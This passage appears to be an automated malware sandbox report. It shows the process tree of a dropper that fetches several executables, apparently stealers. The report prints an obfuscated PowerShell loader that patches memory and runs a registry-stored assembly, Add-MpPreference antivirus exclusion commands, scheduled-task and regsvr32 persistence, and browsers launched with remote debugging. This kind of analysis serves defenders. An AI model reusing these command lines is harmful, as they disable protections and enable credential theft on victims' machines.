nteropServices.Marshal]::GetDelegateForFunctionPointer($LBntRTWCbDBnzzYbp,$dZEWAtFISImFzaXlcHeHRY).Invoke($ivQYabDbBWaVBDAwD,[uint32]8,4,[ref]$kDvjRPuGcD);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](18+119),[Byte](94+107),[Byte](129+55),[Byte](234-147),[Byte](137-137),[Byte](62-55),[Byte](94+34),[Byte](163-26),[Byte](47+163),[Byte](60+135),[Byte](229-92),[Byte](84+117)),0,$ivQYabDbBWaVBDAwD,27-15);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LBntRTWCbDBnzzYbp,$dZEWAtFISImFzaXlcHeHRY).Invoke($ivQYabDbBWaVBDAwD,[uint32]8,0x20,[ref]$kDvjRPuGcD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+'t'+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4272
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3148
- C:\Windows\system32\regsvr32.EXE
  C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx
  2⤵
  PID:3244
- - C:\Windows\SysWOW64\regsvr32.exe
    /s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:5668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx' }) { exit 0 } else { exit 1 }"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:4340
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7132
- C:\Windows\system32\regsvr32.EXE
  C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx
  2⤵
  PID:4764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1460
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1996

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2724

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2864

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3392

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of FindShellTrayWindow
PID:3500
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  - Downloads MZ/PE file
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3680
- - C:\Users\Admin\AppData\Local\Temp\a\esco.exe
    "C:\Users\Admin\AppData\Local\Temp\a\esco.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5036
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:5296
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5296 -s 600
        5⤵
        Program crash
        
        PID:5168
- - C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe
    "C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3488
  - - C:\Users\Admin\AppData\Local\Temp\is-NQSL2.tmp\coinbase.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-NQSL2.tmp\coinbase.tmp" /SL5="$701D4,721126,73216,C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1184
    - - C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4144
      - C:\Users\Admin\AppData\Local\Temp\is-VT2V9.tmp\coinbase.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-VT2V9.tmp\coinbase.tmp" /SL5="$100144,721126,73216,C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe" /VERYSILENT
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:456
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\netapi32_2.ocx"
        7⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1912
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx' }) { exit 0 } else { exit 1 }"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx' }) { exit 0 } else { exit 1 }"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2568
- - C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3244
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe
      "C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe"
      4⤵
      Executes dropped EXE
      PID:4600
  - - C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe
      "C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe"
      4⤵
      Executes dropped EXE
      PID:4360
  - - C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe
      "C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe"
      4⤵
      Executes dropped EXE
      PID:4084
  - - C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe
      "C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      outlook_office_path
      outlook_win_path
      PID:456
- - C:\Users\Admin\AppData\Local\Temp\a\jKuil2m4oIniPNC.exe
    "C:\Users\Admin\AppData\Local\Temp\a\jKuil2m4oIniPNC.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2072
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\jKuil2m4oIniPNC.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1248
  - - C:\Users\Admin\AppData\Local\Temp\a\jKuil2m4oIniPNC.exe
      "C:\Users\Admin\AppData\Local\Temp\a\jKuil2m4oIniPNC.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5048
- - C:\Users\Admin\AppData\Local\Temp\a\osfile01.exe
    "C:\Users\Admin\AppData\Local\Temp\a\osfile01.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3780
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\FicFXwDQ.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1932
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FicFXwDQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBDA9.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4360
  - - C:\Users\Admin\AppData\Local\Temp\a\osfile01.exe
      "C:\Users\Admin\AppData\Local\Temp\a\osfile01.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      PID:5276
- - C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe
    "C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:996
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:5204
  - - C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe
      "C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe"
      4⤵
      Executes dropped EXE
      PID:5236
  - - C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe
      "C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5264
- - C:\Users\Admin\AppData\Local\Temp\a\VBUN8fn.exe
    "C:\Users\Admin\AppData\Local\Temp\a\VBUN8fn.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1484
- - C:\Users\Admin\AppData\Local\Temp\a\6NPpGdC.exe
    "C:\Users\Admin\AppData\Local\Temp\a\6NPpGdC.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3980
  - - C:\Users\Admin\AppData\Local\Temp\a\6NPpGdC.exe
      "C:\Users\Admin\AppData\Local\Temp\a\6NPpGdC.exe"
      4⤵
      Executes dropped EXE
      PID:232
  - - C:\Users\Admin\AppData\Local\Temp\a\6NPpGdC.exe
      "C:\Users\Admin\AppData\Local\Temp\a\6NPpGdC.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4736
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 788
      4⤵
      Program crash
      PID:552
- - C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4844
  - - C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe
      "C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe"
      4⤵
      Executes dropped EXE
      PID:4872
  - - C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe
      "C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe"
      4⤵
      Executes dropped EXE
      PID:3464
  - - C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe
      "C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:3692
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:4004
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8f6c5cc40,0x7ff8f6c5cc4c,0x7ff8f6c5cc58
        6⤵
        
        PID:1988
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1916 /prefetch:2
        6⤵
        
        PID:3636
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2176 /prefetch:3
        6⤵
        
        PID:2928
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2248 /prefetch:8
        6⤵
        
        PID:3140
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2416
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3264 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5040
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4556 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3888
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4724 /prefetch:8
        6⤵
        
        PID:3056
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4644 /prefetch:8
        6⤵
        
        PID:4136
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:8
        6⤵
        
        PID:5648
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4668,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5228 /prefetch:8
        6⤵
        
        PID:6000
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4752 /prefetch:8
        6⤵
        
        PID:5168
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5232,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5256 /prefetch:8
        6⤵
        
        PID:4340
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4984 /prefetch:8
        6⤵
        
        PID:5236
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4672,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4960 /prefetch:8
        6⤵
        
        PID:5936
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4836,i,17473082305911848997,15012389639190123856,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5264 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:5416
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:5580
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f6c646f8,0x7ff8f6c64708,0x7ff8f6c64718
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5376
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,12311177120123414946,1723508216844042385,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
        6⤵
        
        PID:5476
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,12311177120123414946,1723508216844042385,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
        6⤵
        
        PID:5176
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,12311177120123414946,1723508216844042385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
        6⤵
        
        PID:1304
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2220,12311177120123414946,1723508216844042385,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4868
